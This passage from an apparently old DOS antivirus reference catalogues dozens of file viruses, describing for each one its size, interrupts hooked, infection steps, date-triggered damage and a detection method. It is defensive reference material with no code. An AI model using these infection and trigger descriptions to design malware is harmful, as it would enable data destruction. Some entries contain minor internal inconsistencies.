  2643. PC Vectors Hooked: None
  2644.  
  2645. Execution Procedure:
  2646. 1) Checks whether the system date is the first of April. If "yes",
  2647.     then it formats the current disk,
  2648. 2) If "no", then it searches for a *.C* file in the current
  2649.     directory.
  2650. 2) Once it locates a file it checks whether it has been infected by
  2651.     FCB. If "Yes", it continues to look for any  uninfected *.C*
  2652.     file.
  2653. 3) It will only infect one file at a time.
  2654. 4) It then executes the original file.
  2655.  
  2656. Damage:  If the system date is the 1st of April, it formats the
  2657. current disk.
  2658.  
  2659. Detection Method: Infected files will increase by 1200 Bytes.
  2660.  
  2661. Note:
  2662. 1) Doesn't stay resident in memory.
  2663. 2) Casper doesn't hook INT 24h when infecting files. Error message
  2664.     appears if there is an I/O error (such as  write protect).
  2665.  
  2666. [Diogenes]
  2667. Virus Name: Diogenes
  2668. Virus Type: File Virus (infects .COM files)
  2669. Virus Length: 946 Bytes(COM)
  2670. PC Vectors Hooked: None
  2671.  
  2672. Execution Procedure:
  2673. 1) Checks whether the system date is the 31st. If "Yes", it damages
  2674.     all files on the  hard disk, then displays this message on the
  2675.     screen: "DIOGENES 2.0 has visited your hard drive...... This
  2676.     has been another fine product of the Lehigh Valley...Watch (out)
  2677.     for future 'upgrades'.. ... The world's deceit has raped my soul.
  2678.     We melt the plastic people down, then we melt their plastic town."
  2679. 2) If "NO', then it searches for a .COM file in the current directory.
  2680. 2) Once it locates a file it checks whether it has been infected by
  2681.     Diogenes.  If "Yes", it continues to look for   any  uninfected
  2682.     .COM file.
  2683. 3) It will only infect one file at a time.
  2684.  
  2685. Damage:  If the system date is the 31st, it damages all files on the
  2686. hard disk.
  2687.  
  2688. Detection Method: Infected files will increase by 946 Bytes.
  2689.  
  2690. Note:
  2691. 1) Doesn't stay resident in memory.
  2692. 2) Diogenes doesn't hook INT 24h when infecting files. Error message
  2693.     appears if there is an I/O error (such as write protect).
  2694.  
  2695. [Brothers-2]
  2696. Virus Name: Brothers-2
  2697. Virus Type: File Virus (infects .COM files)
  2698. Virus Length: 693 Bytes(COM)
  2699. PC Vectors Hooked: None
  2700.  
  2701. Execution Procedure:
  2702. 1) Checks whether the system date is between the 11th and 25th of
  2703.     November or December. If "Yes", it shows the message:
  2704.     "Brotherhood... I am seeking my brothers "DEICIDE" and
  2705.     "MORGOTH"," then executes the original file.
  2706. 2) If "NO', then  it searches for a .COM file in the current
  2707.     directory.
  2708. 2) Once it locates a file it checks whether it has been infected by
  2709.     Brothers-2. If "Yes", it continues to look for any uninfected
  2710.     .COM file.
  2711. 3) It will check whether the second word of the .COM file is "0xADDE";
  2712.     if "yes", it will show the message: "Found my brother MORGOTH!!!."
  2713.     Then executes the original file.
  2714. 4) It will also check whether the second word of the .COM file is
  2715.     "0x0D90"; if "yes", it will show the message: "Found my brother
  2716.     "DEIGOTH" !!!." Then executes the original file.
  2717. 5) If "NO", then it will infect .COM files one at a time.
  2718. 6)It will execute the original file.
  2719.  
  2720. Damage:  None
  2721.  
  2722. Detection Method: Infected files will increase by 693 Bytes.
  2723.  
  2724. Note:
  2725. 1) Doesn't stay resident in memory.
  2726. 2) Brothers-2 doesn't hook INT 24h when infecting files. Error message
  2727.     appears if there is an I/O error (such as write protect).
  2728.  
  2729. [Mindless]
  2730. Virus Name: Mindless
  2731. Virus Type: File Virus (infects .COM files)
  2732. Virus Length: No change
  2733. PC Vectors Hooked: None
  2734.  
  2735. Execution Procedure:
  2736. 1) Checks whether the system date is Sunday. If "yes", it damages
  2737.     all files on the hard disk.
  2738. 2) If  "NO', then it searches for a *.C* file in the current directory.
  2739. 2) Once it locates a file it infects it and continues searching until
  2740.     it infects all the *.C* files in the current directory.
  2741.  
  2742. Damage:
  2743. 1) If the system date is Sunday, it damages all files on the hard disk.
  2744. 2) Overwrites original files, so the length of infected files won't
  2745.     increase.
  2746.  
  2747. Detection Method:  None
  2748.  
  2749. Note:
  2750. 1) Doesn't stay resident in memory.
  2751. 2) Mindless doesn't hook INT 24h when infecting files. Error message
  2752.     appears if there is an I/O error (such as write protect).
  2753.  
  2754. [Acme]
  2755. Virus Name: Acme
  2756. Virus Type: File Virus (Companion Virus)
  2757. Virus Length: 932 Bytes
  2758. PC Vectors Hooked: None
  2759.  
  2760. Execution Procedure:
  2761. 1) Checks whether the system time is after 4 o'clock in the afternoon.
  2762.     If "Yes", a sound is made, then the system halts.
  2763. 2) If "NO', then it searches for an .EXE file in the current directory.
  2764. 3) It will then create a 923 bytes, "hidden & read-only" .COM file
  2765.     with the .EXE file name.
  2766.  
  2767. Damage: If the system time is after 4 o'clock in the afternoon, a sound
  2768. is made, then the system halts.
  2769.  
  2770. Detection Method: Check whether there are "hidden" .COM files with 923
  2771. bytes of data.
  2772.  
  2773. Note:
  2774. 1) Doesn't stay resident in memory.
  2775. 2) ACME doesn't hook INT 24h when infecting files. Error message
  2776.     appears if there is an I/O error (such as write protect).
  2777.  
  2778. [Dest1]
  2779. Virus Name: DEST1
  2780. Virus Type: File Virus (only infects .COM files)
  2781. Virus Length: 323 Bytes
  2782. PC Vectors Hooked: INT 24h
  2783.  
  2784. Execution Procedure:
  2785. 1) Searches for a COM file in the current directory.
  2786. 2) It checks whether it has  been infected by Dest1. If "Yes", it
  2787.     continues to look for an uninfected .COM file.
  2788. 3) It then infects any uninfected .COM file, one file at a time.
  2789. 4) Finally it executes the original file.
  2790.  
  2791. Damage:  None
  2792.  
  2793. Detection method: Infected files will increase by 323 Bytes.
  2794.  
  2795. Note:
  2796. 1) Doesn't stay resident in memory.
  2797. 2) Dest1 hooks INT 24h when infecting files. Omits I/O error
  2798.     (such as write protect).
  2799.  
  2800. [Dest2]
  2801. Virus Name: DEST2
  2802. Virus Type: File Virus (infects .COM files only)
  2803. Virus Length: 478 Bytes
  2804. PC Vectors Hooked: INT 24h
  2805.  
  2806. Execution Procedure:
  2807. 1) Searches for a COM file in the current directory.
  2808. 2) It checks whether it has  been infected by Dest2. If "Yes", it
  2809.     continues to look for an uninfected .COM file.
  2810. 3) It then infects the .COM file. It finally executes the original
  2811.     file.
  2812.  
  2813. Damage:  If kill-flag=-1, it then deletes a file.
  2814.  
  2815. Detection method:  Infected files will increase by 478 Bytes.
  2816.  
  2817. Note:
  2818. 1) Doesn't stay resident in memory.
  2819. 2) Dest2 hook INT 24h when infecting files. Omits I/O error
  2820.     (such as write protect).
  2821.  
  2822. [Cyber101]
  2823. Virus Name: CYBER101
  2824. Virus Type: File Virus (infects .COM and .EXE files)
  2825. Virus Length: 946 Bytes(COM & EXE)
  2826. PC Vectors Hooked: INT 24h
  2827.  
  2828. Execution Procedure:
  2829. 1) The virus searches for a .COM or .EXE file in the current directory.
  2830. 2) It checks whether it has been infected by Cyber101. If "Yes",
  2831.     it continues to look for an uninfected .COM or .EXE file.
  2832. 3) It then infects any .COM or .EXE files in the current directory
  2833.     two at a time.
  2834. 4) Finally it executes the original file.
  2835.  
  2836. Damage:  None
  2837.  
  2838. Detection method:  Infected files will increase by 946 Bytes.
  2839.  
  2840. Note:
  2841. 1) Doesn't stay resident in memory.
  2842. 2) Cyber101 hooks INT 24h when infecting files. Omits I/O error
  2843.     (such as write protect).
  2844.  
  2845. [Cyber]
  2846. Virus Name: CYBER
  2847. Virus Type: File Virus (infects .COM and .EXE files)
  2848. Virus Length: 1092 Bytes(COM & EXE)
  2849. PC Vectors Hooked: INT 24h
  2850.  
  2851. Execution Procedure:
  2852. 1) The virus searches for a .COM or .EXE file in the current directory.
  2853. 2) It checks whether it has been infected by Cyber. If "Yes", it
  2854.     continues to look for an uninfected .COM or .EXE file.
  2855. 3) It then infects any .COM or .EXE file in the current directory two
  2856.     at a time.
  2857. 4) Finally it executes the original file.
  2858.  
  2859. Damage:  None
  2860.  
  2861. Detection method:  Infected files will increase by 1092 Bytes.
  2862.  
  2863. Note:
  2864. 1) Doesn't stay resident in memory.
  2865. 2) Cyber hooks INT 24h when infecting files. Omits I/O error (such
  2866.     as write protect).
  2867.  
  2868. [7thson-2]
  2869. Virus Name: 7THSON-2
  2870. Virus Type: File Virus (infects .COM files)
  2871. Virus Length: 284 or 332 or 350 Bytes(COM)
  2872. PC Vectors Hooked: INT 24h
  2873.  
  2874. Execution Procedure:
  2875. 1) The virus searches for a .COM file in the current directory.
  2876. 2) It checks whether it has been infected by 7thson-2. If "Yes",
  2877.     it continues to look for an uninfected files.
  2878. 3) It then infects all .COM files in the current directory.
  2879. 4) Finally it executes the original file.
  2880.  
  2881. Damage:  None
  2882.  
  2883. Detection method: Infected files will increase by 284, 332, or 350
  2884. Bytes.
  2885.  
  2886. Note:
  2887. 1) Doesn't stay resident in memory.
  2888. 2) 7thson-2 hooks INT 24h when infecting files. Omits I/O error
  2889. (such as write protect).
  2890.  
  2891. [Bamestra]
  2892. Virus Name: BAMESTRA
  2893. Virus Type: File Virus (infects .EXE files)
  2894. Virus Length: 530 Bytes(EXE)
  2895. PC Vectors Hooked: INT 24h
  2896.  
  2897. Execution Procedure:
  2898. 1) The virus searches for an .EXE file in the current directory.
  2899. 2) It checks whether it has been infected by Bamestra. If "Yes",
  2900.     it continues to look for an uninfected .EXE file.
  2901. 3) It then infects any .EXE  file in the current directory two at a
  2902.     time.
  2903. 4) Finally it executes the original file.
  2904.  
  2905. Damage:  None
  2906.  
  2907. Detection method: Infected files will increase by 530 Bytes.
  2908.  
  2909. Note:
  2910. 1) Doesn't stay resident in memory.
  2911. 2) Bamestra hooks INT 24h when infecting files. Omits I/O error
  2912.     (such as write protect).
  2913.  
  2914. [Abraxas]
  2915. Virus Name: ABRAXAS
  2916. Virus Type: File Virus (infects .COM and .EXE files)
  2917. Virus Length: 546 Bytes(COM & EXE)
  2918. PC Vectors Hooked: INT 24h
  2919.  
  2920. Execution Procedure:
  2921. 1) The virus searches for an .EXE or .COM file in the current
  2922.     directory.
  2923. 2) It checks whether it has been infected by Abraxas.  If "Yes",
  2924.     it continues to look for an uninfected .EXE or .COM file.
  2925. 3) It then infects all .EXE and .COM files in the current directory.
  2926. 4) Finally it executes the original file.
  2927.  
  2928. Damage:  None
  2929.  
  2930. Detection method:  Infected files will increase by 546 Bytes.
  2931.  
  2932. Note:
  2933. 1) Doesn't stay resident in memory.
  2934. 2) Abraxas hooks INT 24h when infecting files. Omits I/O error
  2935.     (such as write protect).
  2936.  
  2937. [MPC-1]
  2938. Virus Name: MPC-1
  2939. Virus Type: File Virus (infects .COM and .EXE files)
  2940. Virus Length: 641 Bytes (COM & EXE)
  2941. PC Vectors Hooked: INT 24h
  2942.  
  2943. Execution Procedure:
  2944. 1) The virus searches for an .EXE or .COM file in the current
  2945.     directory.
  2946. 2) It checks whether it has been infected by MPC-1.  If "Yes",
  2947.     it continues to look for an uninfected .EXE or .COM file.
  2948. 3) It then infects all .EXE and .COM files in the current directory.
  2949. 4) Finally it executes the original file.
  2950.  
  2951. Damage:  None
  2952.  
  2953. Detection method: Infected files will increase by 641 Bytes.
  2954.  
  2955. Note:
  2956. 1) Doesn't stay resident in memory.
  2957. 2) MPC-1 hooks INT 24h when infecting files. Omits I/O error
  2958.     (such as write protect).
  2959.  
  2960. [Zeppelin]
  2961. Virus Name: ZEPPELIN
  2962. Virus Type: File Virus (infects .COM and .EXE files)
  2963. Virus Length: 1508 Bytes (COM and EXE)
  2964. PC Vectors Hooked: INT 24h
  2965.  
  2966. Execution Procedure:
  2967. 1) The virus searches for an .EXE or .COM file in the current
  2968.     directory.
  2969. 2) It checks whether it has been infected by Abraxas. If "Yes",
  2970.     it continues to look for an uninfected .EXE or .COM file.
  2971. 3) It then infects any .EXE and .COM files in the current directory
  2972.     four at a time.
  2973. 4) Finally it displays various codes, and sounds are made at the
  2974.     same time, then the system halts.
  2975.  
  2976. Damage: Shows codes, and makes strange sounds at the same time, then
  2977. the system halts.
  2978.  
  2979. Detection method:
  2980. 1) Infected files will increase by 1508 Bytes.
  2981. 2) Codes appear on the screen.
  2982.  
  2983. Note:
  2984. 1) Doesn't stay resident in memory.
  2985. 2) Zeppelin hooks INT 24h when infecting files. Omits I/O error
  2986.     (such as write protect).
  2987.  
  2988. [Crumble]
  2989. Virus Name: CRUMBLE
  2990. Virus Type: File Virus (infects .COM and .EXE files)
  2991. Virus Length: 778 Bytes (COM & EXE)
  2992. PC Vectors Hooked: INT 24h
  2993.  
  2994. Execution Procedure:
  2995. 1) The virus searches for an .EXE or .COM file in the current
  2996.     directory.
  2997. 2) It checks whether it has been infected by Crumble. If "Yes",
  2998.     it continues to look for an uninfected .EXE or .COM file.
  2999. 3) It then infects any .EXE or .COM files in the current directory
  3000.     two files at a time.
  3001. 4) Finally it checks the system date; if it is Friday, the message
  3002.     "falling letter" appears on the screen, then a letter falls
  3003.     every 5 seconds on the screen.
  3004.  
  3005. Damage:  If it is Friday, system will display "falling letter."
  3006.  
  3007. Detection method:  Infected files will increase by 778 Bytes.
  3008.  
  3009. Note:
  3010. 1) Doesn't stay resident in memory.
  3011. 2) Crumble hooks INT 24h when infecting files. Omits I/O error
  3012.     (such as write protect).
  3013.  
  3014. [COL-MAC]
  3015. Virus Name: COL_MAC
  3016. Virus Type: File Virus (infects .COM and .EXE files)
  3017. Virus Length: 1022 Bytes (COM and EXE)
  3018. PC Vectors Hooked: INT 24h
  3019.  
  3020. Execution Procedure:
  3021. 1) The virus searches for an .EXE or .COM file in the current
  3022.     directory.
  3023. 2) It checks whether it has been infected by COL_MAC. If "Yes",
  3024.     it continues to look for an uninfected .EXE or .COM file.
  3025. 3) It then infects any two .EXE and .COM files in the current
  3026.     directory.
  3027. 4) Finally it shows a lot of random letters on the screen until the
  3028.     ENTER key is pressed.
  3029.  
  3030. Damage:  None
  3031.  
  3032. Detection method:  Infected files will increase by 1022 Bytes.
  3033.  
  3034. Note:
  3035. 1) Doesn't stay resident in memory.
  3036. 2) COL_MAC hooks INT 24h when infecting files. Omits I/O error
  3037.     (such as write protect).
  3038.  
  3039. [Galileo]
  3040. Virus Name: GALILEO
  3041. Virus Type: File Virus (infects .COM and .EXE files)
  3042. Virus Length: 760 Bytes (COM and EXE)
  3043. PC Vectors Hooked: INT 24h
  3044.  
  3045. Execution Procedure:
  3046. 1) Checks whether system date is Monday; if "Yes", the virus will
  3047.     damage all files on the hard disk.
  3048. 2) It searches for a .COM or .EXE file in current directory.
  3049. 3) It then infects all .COM and .EXE files in the current directory.
  3050.  
  3051. Damage: If it is Monday, the virus will damage all files on the
  3052. hard disk.
  3053.  
  3054. Detection method:  Infected files will increase by 760 Bytes.
  3055.  
  3056. Note:
  3057. 1) Doesn't stay resident in memory.
  3058. 2) Galileo hooks INT 24h when infecting files. Omits I/O error
  3059.     (such as write protect).
  3060.  
  3061. [Wharps]
  3062. Virus Name: WHARPS
  3063. Virus Type: File Virus (infects .COM files)
  3064. Virus Length: 572 Bytes (COM)
  3065. PC Vectors Hooked: INT 24h
  3066.  
  3067. Execution Procedure:
  3068. 1) The virus checks whether the system time is 3 o'clock in the
  3069.     morning; if "Yes", the message appears on the screen:
  3070.     "wHaRpS! It is 3:00 a.m. > ETERNAL."
  3071. 2) It searches for a .COM file in the current directory.
  3072. 3) It then checks whether it has been infected by Wharps.  If
  3073.     "Yes", it continues to look for an uninfected .COM file,
  3074.     infecting each file one at a time.
  3075. 5) Finally it executes the original file.
  3076.  
  3077. Damage:  Infected files can't be executed.
  3078.  
  3079. Detection method:  Infected files will increase by 572 Bytes.
  3080.  
  3081. Note:
  3082. 1) Doesn't stay resident in memory.
  3083. 2) Wharps hooks INT 24h when infecting files. Omits I/O error
  3084.     (such as write protect).
  3085.  
  3086. [Bubbles-2]
  3087. Virus Name: BUBBLES-2
  3088. Virus Type: File Virus (infects .COM and .EXE files)
  3089. Virus Length: 927 Bytes (COM and EXE)
  3090. PC Vectors Hooked: INT 24h
  3091.  
  3092. Execution Procedure:
  3093. 1) The virus searches for an .EXE or .COM file in the current
  3094.     directory.
  3095. 2) It checks whether it has been infected by Bubbles-2. If "Yes",
  3096.     it continues to look for an uninfected .EXE or .COM file.
  3097. 3) It then infects all .EXE and .COM files in the current directory.
  3098. 4) It finally checks whether the system date is the 13th and year is
  3099.     not smaller than 1993, then it displays this message on the
  3100.     screen: "Bubbles 2 : "Its back and better then ever.  Is
  3101.     it me or does that make no sense at all?"
  3102.  
  3103. Damage:  Infected files can't be executed.
  3104.  
  3105. Detection method: Infected files will increase by 927 Bytes.
  3106.  
  3107. Note:
  3108. 1) Doesn't stay resident in memory.
  3109. 2) Bubbles-2 hooks INT 24h when infecting files. Omits I/O error
  3110.     (such as write protect).
  3111.  
  3112. [Cybertech]
  3113. Virus Name: CYBERTECH
  3114. Virus Type: File Virus (infects .COM files)
  3115. Virus Length: 1076 Bytes (COM)
  3116. PC Vectors Hooked: INT 24h
  3117.  
  3118. Execution Procedure:
  3119. 1) It checks whether the system date is smaller than 1993. If "Yes",
  3120.     then the virus searches for a .COM file in the current directory.
  3121. 2) It checks whether it has been infected by Cybertech.  If "Yes",
  3122.     it continues to look for an uninfected .COM file.
  3123. 3) It then infects any .COM file in the current directory one at a
  3124.     time.
  3125. 4) If "no", then this message appears on the screen: "The previous
  3126.     year you have been infected by a virus without knowing or removing
  3127.     it. To be gentle to you I decided to remove myself from your
  3128.     system. I suggest you better buy VirusScan of McAfee to ensure
  3129.     yourself complete security of your precious data. Next time you
  3130.     could be infected with a malevolent virus. May I say goodbye to you
  3131.     for now. CyberTech Virus-Strain A  (c) 1992 John Tardy of Trident".
  3132.     It finally restores the current file as before.
  3133.  
  3134. Damage:  None
  3135.  
  3136. Detection method: Infected files will increase by 1076 Bytes.
  3137.  
  3138. Note:
  3139. 1) Doesn't stay resident in memory.
  3140. 2) Cybertech hooks INT 24h when infecting files. Omits I/O error
  3141.     (such as write protect).
  3142.  
  3143. [Crazy]
  3144. Virus Name: CRAZY
  3145. Virus Type: Boot Strap Sector Virus
  3146. Virus Length:  4006 Bytes
  3147. PC Vectors Hooked: None
  3148.  
  3149. Execution Procedure: This virus infects no file, partition or boot
  3150. sector.  When it is executed, it will create 50 subdirectories,
  3151. 50 subdirectories are created in each subdirectory.
  3152.  
  3153. Damage:  None
  3154.  
  3155. Detection method:  None
  3156.  
  3157. Note:
  3158. 1) Doesn't stay resident in memory.
  3159. 2) Crazy doesn't hook INT 24h when infecting files. An error message
  3160.     appears if there is an I/O error (such as write protect).
  3161.  
  3162. [Burger_560-8]
  3163. Virus Name: BURGER_560-8
  3164. Virus Type: File Virus (infects .COM files)
  3165. Virus Length: No change
  3166. PC Vectors Hooked: None
  3167.  
  3168. Execution Procedure:
  3169. 1) Searches for a .COM file in A:.
  3170. 2) It checks whether it has been infected by Burger_560-8. If "Yes",
  3171.     it continues to look for an uninfected  .COM file.
  3172. 3) It then infects an uninfected file one at a time.
  3173. 4) If no .COM file is infected, it will continue to look for an .EXE
  3174.     file in A:.
  3175. 5) It finally renames the .EXE file to .COM, then it infects the
  3176.     .COM file.
  3177.  
  3178. Damage: Overwrites the original file, so the length of the infected
  3179. file won't increase.
  3180.  
  3181. Detection method: Changes .EXE file to a .COM file.
  3182.  
  3183. Note:
  3184. 1) Doesn't stay resident in memory.
  3185. 2) Burger_560-8 don't hooks INT 24h when infecting files. Error
  3186.     message appears if there is an I/O error (such as write protect).
  3187.  
  3188. [Boys]
  3189. Virus Name: BOYS
  3190. Virus Type: File Virus (infects .COM files)
  3191. Virus Length: 500 Bytes(COM)
  3192. PC Vectors Hooked: None
  3193.  
  3194. Execution Procedure:
  3195. 1) It searches for an .EXE file, it then changes the attribute to
  3196.     "SYSTEM".
  3197. 2) It searches for a .COM file in the current directory.
  3198. 3) It then checks whether it has been infected by Boys. If "Yes",
  3199.     it continues to look for an uninfected .COM file.
  3200. 4) It only infects one file at a time, and changes the attribute to
  3201.     "READ-ONLY".
  3202. 5) Finally it executes the original file.
  3203.  
  3204. Damage:  None.
  3205.  
  3206. Detection method: Infected files will increase by 500 Bytes.
  3207.  
  3208. Note:
  3209. 1) Doesn't stay resident in memory.
  3210. 2) Boys doesn't hook INT 24h when infecting files. An error message
  3211.     appears if there is an I/O error (such as write protect).
  3212.  
  3213. [Null]
  3214. Virus Name: NULL
  3215. Virus Type: File Virus (infects .COM files)
  3216. Virus Length: 733 Bytes (COM)
  3217. PC Vectors Hooked: None
  3218.  
  3219. Execution Procedure:
  3220. 1) It first decodes.
  3221. 2) Then it searches for a .COM file in the current directory.
  3222. 3) It checks whether it has  been infected by Null. If "Yes", it
  3223.     continues to look for an uninfected .COM file.
  3224. 4) It infects only one file at a time.
  3225. 5) It then executes  the original file.
  3226. 6) If it can not infect a .COM file, then it checks whether the
  3227.     DAY =30. If "yes", it destroys all the data on the disk, then
  3228.     shows the message: "Your disk is dead! Long life Doomsday 1.0."
  3229.  
  3230. Damage: If DAY = 30 , then it destroys all data on the current disk.
  3231.  
  3232. Detection method: Infected files will increase by 733 Bytes.
  3233.  
  3234. Note:
  3235. 1) Doesn't stay resident in memory.
  3236. 2) Null doesn't hook INT 24h when infecting files. An error message
  3237.     appears if there is an I/O error (such as write protect).
  3238.  
  3239. [Vienna-11]
  3240. Virus Name: VIENNA-11
  3241. Virus Type: File Virus (infects .COM files)
  3242. Virus Length: 943 Bytes (COM)
  3243. PC Vectors Hooked: None
  3244.  
  3245. Execution Procedure:
  3246. 1) Checks whether the clock's Seconds field is equal to .0004. If
  3247.     "Yes", then this message will appear on the screen: "Sorry
  3248.     this computer is no longer operational due to an outbreak of
  3249.     Bush is hero,  Have a Nice day. . . "
  3250. 2) Next it will check as to whether the time is equal to 7:45 and
  3251.     24th of March. If "Yes", then a message will appear on the
  3252.     screen: "VIPERizer, Strain B (c) 1992, Stin gray/VIPER
  3253.     Happy Valentines Day !"  It then destroys all data on all of the
  3254.     disks including the hard disk.
  3255. 3) If "No", then it searches for a .COM file in the current directory.
  3256. 4) Checks whether it has been infected by Vienna-11. If "Yes", it
  3257.     continues to look for an uninfected .COM file.
  3258. 5) It only infects one file at a time, afterwards it executes the
  3259.     original file.
  3260.  
  3261. Damage: Destroys all data on all of the disks.
  3262.  
  3263. Detection method: Infected files will increase by 943 Bytes.
  3264.  
  3265. Note:
  3266. 1) Doesn't stay resident in memory.
  3267. 2) Vienna-11 doesn't hook INT 24h when infecting files. An error
  3268.     message appears if there is an I/O error (such as write protect).
  3269.  
  3270. [Intrud-B]
  3271. Virus Name: INTRUD-B
  3272. Virus Type: File Virus (infects .EXE files)
  3273. Virus Length: 1225 Bytes (EXE)
  3274. PC Vectors Hooked: None
  3275.  
  3276. Execution Procedure:
  3277. 1) Searches for an .EXE file in the current directory.
  3278. 2) It checks whether it has  been infected by Intrud-B. If "Yes",
  3279.     it continues to look for an uninfected .EXE file.
  3280. 3) It then infects only one file at a time.
  3281. 4) It then executes the original file.
  3282.  
  3283. Damage:  None
  3284.  
  3285. Detection method: Infected files will increase by 1225 Bytes.
  3286.  
  3287. Note:
  3288. 1) Doesn't stay resident in memory.
  3289. 2) Intrud-B doesn't hook INT 24h when infecting files. An error
  3290.     message appears if there is an I/O error (such as write
  3291.     protect).
  3292.  
  3293. [New-s]
  3294. Virus Name: NEW-S
  3295. Virus Type: File Virus (infects .EXE files)
  3296. Virus Length: 1214 Bytes
  3297. PC Vectors Hooked: None
  3298.  
  3299. Execution Procedure:
  3300. 1) First shows a strange figure on the screen (with music).
  3301. 2) Then searches for an EXE file in the current directory.  It then
  3302.     creates a file of the same name with the length of 1214 bytes
  3303.     and overwrites the  original file.  The new file is New-S.
  3304. 3) Finally it overwrites the COMMAND.COM in the root directory and
  3305.     copies the overwritten file to the root directory.
  3306.  
  3307. Damage:  Overwrites original file.
  3308.  
  3309. Detection method: Infected files will increase by 1214 Bytes.
  3310.  
  3311. Note:
  3312. 1) Doesn't stay resident in memory.
  3313. 2) NEW-S doesn't hook INT 24h when infecting files. An error message
  3314.     appears if there is an I/O error (such as write protect).
  3315.  
  3316. [X-1-B]
  3317. Virus Name: X-1-B
  3318. Virus Type: File Virus (infects .EXE files)
  3319. Virus Length: 555 Bytes (EXE)
  3320. PC Vectors Hooked: None
  3321.  
  3322. Execution Procedure:
  3323. 1) The virus checks whether the system date is the 5th of March.
  3324.     If "Yes", it displays the message: "ICE-9 Present In Association
  3325.     with.. The ARcV [X-1] Michelangelo activates. . -<TOMORROW>-,"
  3326.     then the system halts.
  3327. 2) If "No", then it searches for an .EXE file in the current directory.
  3328. 3) It checks whether it has been infected already by X-1. If "Yes", it
  3329.     continues to look for an uninfected .EXE file.
  3330. 4) It then infects only one file at a time.
  3331. 5) Then it executes the original file.
  3332.  
  3333. Damage: If it is the 5th of  March, it displays a message, and then the
  3334. system halts.
  3335.  
  3336. Detection method: Infected files will increase by 555 Bytes.
  3337.  
  3338. Note:
  3339. 1) Doesn't stay resident in memory.
  3340. 2) X-1 doesn't hook INT 24h when infecting files. An error message
  3341.     appears if there is an I/O error (such as  write protect).
  3342.  
  3343. [Lep-FVHS]
  3344. Virus Name: LEP-FVHS
  3345. Virus Type: File Virus (infects .COM and .EXE files)
  3346. Virus Length: NO change
  3347. PC Vectors Hooked: None
  3348.  
  3349. Execution Procedure:
  3350. 1) Shows the message: "allocating memory..... Please wait.....
  3351.     Hard time accessing memory, please turn off all RAM resident
  3352.     programs and press>>Enter<< to continue...."
  3353. 2) The virus searches for an .EXE or .COM file in the current
  3354.     directory.
  3355. 3) It checks whether it has been infected by LEP-FVHS.  If "Yes",
  3356.     it continues to look for an uninfected .EXE or .COM file.
  3357. 4) If "No", it then infects any four .EXE and .COM files at a time
  3358.     in the current directory.
  3359. 5) Shows the message: "Program too big to fit in memory."
  3360.  
  3361. Damage: Overwrites original files, so the length of infected files
  3362. won't increase.
  3363.  
  3364. Detection method: Shows the message: "Allocating memory...."
  3365.  
  3366. Note:
  3367. 1) Doesn't stay resident in memory.
  3368. 2) LEP-FVHS doesn't  hook INT 24h when infecting files. An error
  3369.     message appears if there is an I/O error (such as write protect).
  3370.  
  3371. [Monxla]
  3372. Virus Name: MONXLA
  3373. Virus Type: File Virus (infects .COM files)
  3374. Virus Length: 939 Bytes (COM)
  3375. PC Vectors Hooked: None
  3376.  
  3377. Execution Procedure:
  3378. 1) The virus searches for a .COM file in the current directory.
  3379. 2) It checks whether the system date is the 13th; if "Yes", then it
  3380.     destroys the file.
  3381. 3) If "No", it checks whether it has been infected by MONXLA.
  3382.     If "Yes", it continues to look for an uninfected .COM file.
  3383. 3) It then infects any one .COM file in the current directory.
  3384. 4) Finally it executes the original file.
  3385.  
  3386. Damage: If the system date is the 13th, then it destroys a .COM file.
  3387.  
  3388. Detection method: Infected files will increase by 939 Bytes.
  3389.  
  3390. Note:
  3391. 1) Doesn't stay resident in memory.
  3392. 2) MONXLA doesn't hook INT 24h when infecting files.  An error message
  3393.     appears if there is an I/O error (such as write protect).
  3394.  
  3395. [More-649]
  3396. Virus Name: MORE-649
  3397. Virus Type: Memory Resident, File Virus (infects .COM files)
  3398. Virus Length:  649 Bytes (COM)
  3399. PC Vectors Hooked: INT 21h (AX=4B00h), execute program
  3400.  
  3401. Infection Procedure:
  3402. 1) The virus checks whether it is already loaded resident in memory.
  3403.     If "No", it then loads itself resident into memory by hooking
  3404.     INT 21h.
  3405. 2) It then executes the original file.
  3406. 3) With itself loaded resident in memory it will infect any
  3407.     uninfected file that is executed. (b) It doesn't infect .EXE
  3408.     files or files with special dates (year larger than 1999).
  3409. 4) When the virus detects a file that has a date larger than 1999,
  3410.     this message appears: "OH NO NOT MORE ARCV".
  3411.  
  3412. Damage:  None
  3413.  
  3414. Detection method: Infected .COM files increase by 649 Bytes.
  3415.  
  3416. [Arka]
  3417. Virus Name: ARKA
  3418. Virus Type: Memory Resident, File Virus (infects .COM files).
  3419. Virus Length:  1905 Bytes (COM)
  3420. PC Vectors Hooked: INT 21h (AX=4B00h), execute program
  3421.  
  3422. Infection Procedure:
  3423. 1) The virus checks whether it is already loaded resident in memory.
  3424.     If "No", it then loads itself resident into memory by hooking INT
  3425.     21h.
  3426. 2) It then executes the original file.
  3427. 3) With itself loaded resident in memory it will infect any executed
  3428.     file that is not already infected with the ARKA virus.
  3429.  
  3430. Damage:  None
  3431.  
  3432. Detection method: Infected COM files increase by 1905 Bytes.
  3433.  
  3434. [578]
  3435. Virus Name: 578
  3436. Virus Type:  Memory Resident, File Virus (infects .COM files)
  3437. Virus Length:  578 Bytes (COM)
  3438. PC Vectors Hooked: INT 21h (AX=4B00h), execute program
  3439.  
  3440. Infection Procedure:
  3441. 1) The virus checks whether it is already loaded resident in memory.
  3442.     If "No", it then loads itself resident into memory by hooking INT
  3443.     21h.
  3444. 2) It then executes the original file.
  3445. 3) With itself loaded resident in memory it will infect any uninfected
  3446.     file that is executed. (b) It doesn't infect .EXE files.
  3447. 4) The virus will then check the system date; if it is later than
  3448.     April 3, then the virus will destroy all data on A: followed by
  3449.     the displaying of three colored flags and the message: "ITALY
  3450.     IS THE BEST COUNTRY IN THE WORLD."
  3451.  
  3452. Damage: If the system date is later than April 3, the virus will
  3453. destroy all data on A:.
  3454.  
  3455. Detection method: Infected COM files increase by 578 Bytes.
  3456.  
  3457. Note:
  3458. 1) 578 doesn't hook INT 24h when infecting files. An error message
  3459.     appears if there is an I/O error (such as write protect).
  3460.  
  3461. [5LO]
  3462. Virus Name: 5LO
  3463. Virus Type:  Memory Resident, File Virus (infects .EXE files).
  3464. Virus Length:  1125-1140 Bytes (EXE)
  3465. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3466.  
  3467. Infection Procedure:
  3468. 1) The virus checks whether it is already loaded resident in memory.
  3469.     If "No", it then loads itself resident into memory by hooking INT
  3470.     21h
  3471. 2) It then executes the original file.
  3472. 3) With itself loaded resident into memory it will infect any
